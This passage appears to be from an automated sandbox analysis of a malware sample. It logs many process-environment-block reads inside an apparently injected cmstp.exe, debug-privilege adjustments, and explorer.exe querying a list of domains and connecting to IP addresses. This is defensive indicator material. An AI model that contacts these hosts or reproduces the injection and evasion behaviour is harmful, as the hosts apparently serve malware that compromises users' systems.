          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]4_2_0467C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]4_2_0467C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461BC2C mov eax, dword ptr fs:[00000030h]4_2_0461BC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]4_2_046B740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]4_2_046B740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]4_2_046B740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A14FB mov eax, dword ptr fs:[00000030h]4_2_046A14FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]4_2_04666CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]4_2_04666CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]4_2_04666CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8CD6 mov eax, dword ptr fs:[00000030h]4_2_046B8CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F849B mov eax, dword ptr fs:[00000030h]4_2_045F849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]4_2_0460C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]4_2_0460C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04623D43 mov eax, dword ptr fs:[00000030h]4_2_04623D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663540 mov eax, dword ptr fs:[00000030h]4_2_04663540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04693D40 mov eax, dword ptr fs:[00000030h]4_2_04693D40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04607D50 mov eax, dword ptr fs:[00000030h]4_2_04607D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0466A537 mov eax, dword ptr fs:[00000030h]4_2_0466A537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AE539 mov eax, dword ptr fs:[00000030h]4_2_046AE539
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]4_2_04614D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]4_2_04614D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]4_2_04614D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8D34 mov eax, dword ptr fs:[00000030h]4_2_046B8D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EAD30 mov eax, dword ptr fs:[00000030h]4_2_045EAD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04698DF1 mov eax, dword ptr fs:[00000030h]4_2_04698DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov ecx, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]4_2_045FD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]4_2_045FD5E0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0469FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04618E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04628EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0469FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04604120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04612990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04674257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.jcernadas.com
          Source: C:\Windows\explorer.exe | Domain query: www.theholisticbirthco.com
          Source: C:\Windows\explorer.exe | Domain query: www.productsoffholland.com
          Source: C:\Windows\explorer.exe | Network Connect: 45.88.202.115 80
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.tor-one.com
          Source: C:\Windows\explorer.exe | Domain query: www.glgshopbd.com
          Source: C:\Windows\explorer.exe | Network Connect: 192.185.48.194 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe | Domain query: www.autotrafficbot.com
          Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exe | Network Connect: 188.93.150.75 80
          Source: C:\Windows\explorer.exe | Network Connect: 52.15.160.167 80
          Source: C:\Windows\explorer.exe | Network Connect: 52.216.152.43 80
          Source: C:\Windows\explorer.exe | Network Connect: 45.82.188.40 80
          Source: C:\Windows\explorer.exe | Network Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exe | Domain query: www.de-knutselkeet.com
          Source: C:\Windows\explorer.exe | Domain query: www.markmalls.com
          Source: C:\Windows\explorer.exe | Network Connect: 80.67.16.8 80
          Source: C:\Windows\explorer.exe | Network Connect: 35.240.239.44 80
          Source: C:\Windows\explorer.exe | Domain query: www.jamessicilia.com
          Source: C:\Windows\explorer.exe | Domain query: www.kinfet.com
          Source: C:\Windows\explorer.exe | Domain query: www.physicalrobot.com
          Source: C:\Windows\explorer.exe | Domain query: www.zhuledao.com
          Source: C:\Windows\explorer.exe | Domain query: www.cgpizza.net
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
